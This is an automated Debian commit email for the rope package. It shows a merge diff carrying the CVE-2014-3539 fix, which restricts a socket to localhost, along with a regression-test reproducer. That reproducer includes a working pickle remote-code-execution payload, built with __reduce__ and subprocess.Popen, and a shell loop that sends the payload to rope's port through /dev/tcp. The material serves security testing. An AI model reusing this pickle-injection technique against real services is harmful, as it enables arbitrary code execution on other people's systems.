[Python-modules-commits] [rope] 04/11: merge patched-debian-experimental into debian-experimental
Arnaud Fontaine
arnau at moszumanska.debian.org
Thu Apr 13 08:52:43 UTC 2017
This is an automated email from the git hooks/post-receive script.
arnau pushed a commit to branch debian-experimental
in repository rope.
commit eab3579edf69be0e6f643408fb555a19e1975556
Merge: 78f7d39 da4b327
Author: Arnaud Fontaine <arnau at debian.org>
Date: Thu Apr 13 17:33:46 2017 +0900
merge patched-debian-experimental into debian-experimental
PKG-INFO | 20 +-
README.rst | 14 +-
debian/.git-dpm | 6 +-
debian/patches/CVE-2014-3539.patch | 10 +-
docs/overview.rst | 123 +++++++
docs/rope.rst | 1 +
PKG-INFO => rope.egg-info/PKG-INFO | 20 +-
rope.egg-info/SOURCES.txt | 141 ++++++++
rope.egg-info/dependency_links.txt | 1 +
rope.egg-info/top_level.txt | 1 +
rope/__init__.py | 3 +-
rope/base/astutils.py | 3 +
rope/base/builtins.py | 24 +-
rope/base/codeanalyze.py | 32 +-
rope/base/default_config.py | 23 +-
rope/base/evaluate.py | 7 +-
rope/base/fscommands.py | 21 +-
rope/base/oi/doa.py | 4 +-
rope/base/oi/runmod.py | 29 +-
rope/base/oi/soi.py | 31 +-
rope/base/oi/type_hinting/__init__.py | 0
rope/base/oi/type_hinting/evaluate.py | 353 +++++++++++++++++++
rope/base/oi/type_hinting/factory.py | 70 ++++
rope/base/oi/type_hinting/interfaces.py | 25 ++
rope/base/oi/type_hinting/providers/__init__.py | 0
rope/base/oi/type_hinting/providers/composite.py | 59 ++++
rope/base/oi/type_hinting/providers/docstrings.py | 193 ++++++++++
rope/base/oi/type_hinting/providers/inheritance.py | 66 ++++
rope/base/oi/type_hinting/providers/interfaces.py | 37 ++
.../oi/type_hinting/providers/numpydocstrings.py | 41 +++
.../providers/pep0484_type_comments.py | 42 +++
rope/base/oi/type_hinting/resolvers/__init__.py | 0
rope/base/oi/type_hinting/resolvers/composite.py | 22 ++
rope/base/oi/type_hinting/resolvers/interfaces.py | 10 +
rope/base/oi/type_hinting/resolvers/types.py | 16 +
rope/base/oi/type_hinting/utils.py | 136 ++++++++
rope/base/project.py | 15 +-
rope/base/pyobjects.py | 2 +-
rope/base/pyobjectsdef.py | 47 ++-
rope/base/stdmods.py | 25 +-
rope/base/{utils.py => utils/__init__.py} | 19 +-
rope/base/utils/datastructures.py | 67 ++++
rope/base/utils/pycompat.py | 45 +++
rope/contrib/finderrors.py | 2 +-
rope/contrib/fixsyntax.py | 2 +-
rope/refactor/extract.py | 28 +-
rope/refactor/importutils/__init__.py | 9 +-
rope/refactor/importutils/module_imports.py | 81 +++--
rope/refactor/move.py | 140 ++++++--
rope/refactor/occurrences.py | 20 +-
rope/refactor/patchedast.py | 105 ++++--
rope/refactor/suites.py | 21 +-
ropetest/__init__.py | 7 +-
ropetest/advanced_oi_test.py | 14 +-
ropetest/builtinstest.py | 5 +-
ropetest/codeanalyzetest.py | 30 +-
ropetest/contrib/__init__.py | 5 +-
ropetest/contrib/autoimporttest.py | 5 +-
ropetest/contrib/changestacktest.py | 6 +-
ropetest/contrib/codeassisttest.py | 6 +-
ropetest/contrib/finderrorstest.py | 6 +-
ropetest/contrib/fixmodnamestest.py | 6 +-
ropetest/objectdbtest.py | 6 +-
ropetest/objectinfertest.py | 9 +-
ropetest/projecttest.py | 18 +-
ropetest/pycoretest.py | 33 +-
ropetest/pyscopestest.py | 5 +-
ropetest/refactor/extracttest.py | 59 +++-
ropetest/refactor/importutilstest.py | 76 +++-
ropetest/refactor/movetest.py | 123 ++++++-
ropetest/refactor/multiprojecttest.py | 10 +-
ropetest/refactor/patchedasttest.py | 168 ++++++++-
ropetest/refactor/renametest.py | 5 +-
ropetest/refactor/restructuretest.py | 5 +-
ropetest/refactor/similarfindertest.py | 9 +-
ropetest/refactor/suitestest.py | 5 +-
ropetest/runmodtest.py | 8 +-
ropetest/simplifytest.py | 5 +-
ropetest/testutils.py | 9 +-
ropetest/type_hinting_test.py | 387 +++++++++++++++++++++
setup.cfg | 5 +
setup.py | 33 +-
82 files changed, 2959 insertions(+), 321 deletions(-)
diff --cc debian/.git-dpm
index 1b025f4,0000000..b3a9538
mode 100644,000000..100644
--- a/debian/.git-dpm
+++ b/debian/.git-dpm
@@@ -1,11 -1,0 +1,11 @@@
+# see git-dpm(1) from git-dpm package
- 7f19bb6d79d2426f4b29e531f12116398efce357
- 7f19bb6d79d2426f4b29e531f12116398efce357
- 835afd55ba93a1632462d454b5be0985b6ca9794
++da4b3278b40a1cf16798771e5b67d918d8693393
++da4b3278b40a1cf16798771e5b67d918d8693393
++0d2c73dafa27bdee016a7008b8f15afec48ffe20
+0d2c73dafa27bdee016a7008b8f15afec48ffe20
+rope_0.10.5.orig.tar.gz
+9e4dd71acbdd45cbaf3d6493c2298d1e1d5f786c
+243931
+debianTag="debian/%e%v"
+patchedTag="patched/%e%v"
+upstreamTag="upstream/%e%u"
diff --cc debian/patches/CVE-2014-3539.patch
index 8b24509,0000000..9bb6f16
mode 100644,000000..100644
--- a/debian/patches/CVE-2014-3539.patch
+++ b/debian/patches/CVE-2014-3539.patch
@@@ -1,215 -1,0 +1,215 @@@
- From 7f19bb6d79d2426f4b29e531f12116398efce357 Mon Sep 17 00:00:00 2001
++From da4b3278b40a1cf16798771e5b67d918d8693393 Mon Sep 17 00:00:00 2001
+From: Arnaud Fontaine <arnau at debian.org>
+Date: Thu, 26 Jan 2017 13:38:11 +0900
+Subject: =?UTF-8?q?Mitigations=20for=20CVE-2014-3539=20from=20the=20upstre?=
+ =?UTF-8?q?am=20author=20personal=20repository=0A(https://github.com/mcepl?=
+ =?UTF-8?q?/rope):?=
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+ commit a2ea5f98d18ed037090afb048a48f87b515ff8dc
+ Author: Matěj Cepl <mcepl at cepl.eu>
+ Date: Tue Feb 10 12:34:20 2015 +0100
+
+ Just add reporter’s suggested reproducer
+
+ commit a6cb534debe9aff623b6b19ae2dedbf872069a50
+ Author: Matej Cepl <mcepl at cepl.eu>
+ Date: Thu Feb 12 01:12:15 2015 +0100
+
+ limit socket connections to localhost
+
+Patch-Name: CVE-2014-3539.patch
+---
+ rope/base/oi/doa.py | 2 +-
+ ropetest/CVE20143539/CVE-2014-3539.py | 18 ++++++++++++++++++
+ ropetest/CVE20143539/README.md | 17 +++++++++++++++++
+ ropetest/CVE20143539/__init__.py | 32 ++++++++++++++++++++++++++++++++
+ ropetest/CVE20143539/generate_payload.py | 8 ++++++++
+ ropetest/CVE20143539/payload.txt | 9 +++++++++
+ ropetest/CVE20143539/project/hello.py | 1 +
+ ropetest/CVE20143539/run_reproducer.sh | 11 +++++++++++
+ ropetest/__init__.py | 3 +++
+ 9 files changed, 100 insertions(+), 1 deletion(-)
+ create mode 100644 ropetest/CVE20143539/CVE-2014-3539.py
+ create mode 100644 ropetest/CVE20143539/README.md
+ create mode 100644 ropetest/CVE20143539/__init__.py
+ create mode 100644 ropetest/CVE20143539/generate_payload.py
+ create mode 100644 ropetest/CVE20143539/payload.txt
+ create mode 100644 ropetest/CVE20143539/project/hello.py
+ create mode 100644 ropetest/CVE20143539/run_reproducer.sh
+
+diff --git a/rope/base/oi/doa.py b/rope/base/oi/doa.py
- index de45902..ed44d25 100644
++index 3f314c6..65e3e26 100644
+--- a/rope/base/oi/doa.py
++++ b/rope/base/oi/doa.py
+@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
+ self.data_port = 3037
+ while self.data_port < 4000:
+ try:
+- self.server_socket.bind(('', self.data_port))
++ self.server_socket.bind(('127.0.0.1', self.data_port))
+ break
+ except socket.error:
+ self.data_port += 1
+diff --git a/ropetest/CVE20143539/CVE-2014-3539.py b/ropetest/CVE20143539/CVE-2014-3539.py
+new file mode 100644
+index 0000000..5dd37e1
+--- /dev/null
++++ b/ropetest/CVE20143539/CVE-2014-3539.py
+@@ -0,0 +1,18 @@
++#!/usr/bin/env python
++# CVE-2014-3539 reproducer/exploit
++# Vasyl Kaigorodov <vkaigoro at redhat.com>
++# Tested on Python 2.7.x
++
++import sys
++from rope.base import project
++
++try:
++ open('payload.txt', 'r')
++except IOError:
++ print("payload.txt not found, run:")
++ print("\tpython generate_payload.py")
++ sys.exit(1)
++
++myproject = project.Project('project/')
++res = myproject.get_resource("hello.py")
++myproject.pycore.run_module(res)
+diff --git a/ropetest/CVE20143539/README.md b/ropetest/CVE20143539/README.md
+new file mode 100644
+index 0000000..5c620ef
+--- /dev/null
++++ b/ropetest/CVE20143539/README.md
+@@ -0,0 +1,17 @@
++== List of files ==
++
++project/ - directory containing an example python module
++CVE-2014-3539.py - python script which tries to load an example python module
++ for re-factoring (normal workflow simulation)
++generate_payload.py - generates payload.txt (evil code to run)
++payload.txt - example payload (running /bin/uptime)
++run_reproducer.sh - main file that sticks above together
++
++== Usage ==
++
++Run ./run_reproducer.sh.
++If the system is vulnerable, you'll see the output similar to below:
++
++ $ ./run_reproducer.sh
++ SUCCESS: 15:13:46 up 21:26, 2 users, load average: 0.02, 0.63, 1.01
++
+diff --git a/ropetest/CVE20143539/__init__.py b/ropetest/CVE20143539/__init__.py
+new file mode 100644
+index 0000000..3ab3be6
+--- /dev/null
++++ b/ropetest/CVE20143539/__init__.py
+@@ -0,0 +1,32 @@
++import os.path
++import subprocess
++try:
++ import unittest2 as unittest
++except ImportError:
++ import unittest
++
++
++class TestCVE20143539(unittest.TestCase):
++ def test_case(self):
++ cur_dir = os.path.dirname(__file__)
++ script_name = os.path.join(cur_dir, 'run_reproducer.sh')
++ pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
++ stderr=subprocess.PIPE, cwd=cur_dir)
++ pid.communicate()
++ self.assertEquals(pid.returncode, 0)
++
++
++def suite():
++ result = unittest.TestSuite()
++ result.addTests(unittest.makeSuite(TestCVE20143539))
++ return result
++
++
++if __name__ == '__main__':
++ import sys
++ if len(sys.argv) > 1:
++ unittest.main()
++ else:
++ runner = unittest.TextTestRunner()
++ res = runner.run(suite())
++ sys.exit(not res.wasSuccessful())
+diff --git a/ropetest/CVE20143539/generate_payload.py b/ropetest/CVE20143539/generate_payload.py
+new file mode 100644
+index 0000000..c8d3e01
+--- /dev/null
++++ b/ropetest/CVE20143539/generate_payload.py
+@@ -0,0 +1,8 @@
++import cPickle
++import subprocess
++
++class RunBinSh(object):
++ def __reduce__(self):
++ return (subprocess.Popen, (('/bin/uptime',),))
++
++open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
+diff --git a/ropetest/CVE20143539/payload.txt b/ropetest/CVE20143539/payload.txt
+new file mode 100644
+index 0000000..434dd0f
+--- /dev/null
++++ b/ropetest/CVE20143539/payload.txt
+@@ -0,0 +1,9 @@
++csubprocess
++Popen
++p1
++((S'/bin/uptime'
++p2
++tp3
++tp4
++Rp5
++.
+\ No newline at end of file
+diff --git a/ropetest/CVE20143539/project/hello.py b/ropetest/CVE20143539/project/hello.py
+new file mode 100644
+index 0000000..7df869a
+--- /dev/null
++++ b/ropetest/CVE20143539/project/hello.py
+@@ -0,0 +1 @@
++print("Hello, World!")
+diff --git a/ropetest/CVE20143539/run_reproducer.sh b/ropetest/CVE20143539/run_reproducer.sh
+new file mode 100644
+index 0000000..b1f7fac
+--- /dev/null
++++ b/ropetest/CVE20143539/run_reproducer.sh
+@@ -0,0 +1,11 @@
++#!/bin/bash
++export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
++trap "killall -- $(basename $0)" EXIT
++
++(while : ; do
++ ( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
++ && echo -n "SUCCESS: "
++done)&
++
++python CVE-2014-3539.py 2>/dev/null
++exit $?
+diff --git a/ropetest/__init__.py b/ropetest/__init__.py
- index f1cb459..744beee 100644
++index 699f8c6..d2e3aaf 100644
+--- a/ropetest/__init__.py
++++ b/ropetest/__init__.py
- @@ -16,6 +16,8 @@ import ropetest.simplifytest
++@@ -20,6 +20,8 @@ import ropetest.simplifytest
+ import ropetest.contrib
+ import ropetest.refactor
+
++import ropetest.CVE20143539
++
+
+ def suite():
+ result = unittest.TestSuite()
- @@ -33,6 +35,7 @@ def suite():
++@@ -38,6 +40,7 @@ def suite():
+
+ result.addTests(ropetest.refactor.suite())
+ result.addTests(ropetest.contrib.suite())
++ result.addTests(ropetest.CVE20143539.suite())
+
+ return result
+
--
Alioth's /usr/local/bin/git-commit-notice on /srv/git.debian.org/git/python-modules/packages/rope.git
More information about the Python-modules-commits
mailing list